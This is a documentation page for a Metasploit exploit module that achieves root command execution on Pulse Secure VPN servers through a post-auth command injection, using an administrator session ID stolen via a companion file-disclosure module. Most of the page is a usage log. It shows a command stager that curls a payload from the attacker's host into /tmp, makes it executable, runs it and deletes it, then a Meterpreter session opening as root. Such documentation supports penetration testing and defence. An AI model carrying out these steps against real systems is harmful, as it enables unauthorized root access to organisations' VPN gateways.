adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a17b2c20413ecb5257c3fd6b89b790dc6976bf9a
metasploit-gs/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md
T
William Vu a17b2c2041 Add module doc
2019-11-12 02:10:10 -06:00

3.1 KiB
Raw Blame History

Introduction

This module exploits a post-auth command injection in the Pulse Secure VPN server to execute arbitrary commands as root.

Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit.

A valid administrator session ID is required in lieu of untested SSRF.

Targets

Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper

Options

SID

Set this to a valid administrator session ID. Typically retrieved using the auxiliary/gather/pulse_secure_file_disclosure module.

Usage

msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857
sid => 676f5f892e8c4a6419f10564f9e9d857
msf5 exploit(linux/http/pulse_secure_cmd_exec) > run

[*] Started reverse TCP handler on 127.0.0.1:[redacted]
[+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857
[*] Obtaining CSRF token
[+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5
[*] Executing Linux Dropper target
[*] Using URL: https://0.0.0.0:[redacted]/HSEjp77
[*] Local IP: https://[redacted]:[redacted]/HSEjp77
[*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"]
[*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77
[*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18)
[+] Payload execution successful
[*] Command Stager progress -  63.96% done (71/111 bytes)
[*] Executing command: env chmod +x /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress -  87.39% done (97/111 bytes)
[*] Executing command: env /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600
[!] Payload execution may have failed
[*] Command Stager progress - 102.70% done (114/111 bytes)
[*] Executing command: env rm -f /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress - 123.42% done (137/111 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : [redacted]
OS           :  (Linux 2.6.32-00486-gddd7e32-dirty)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink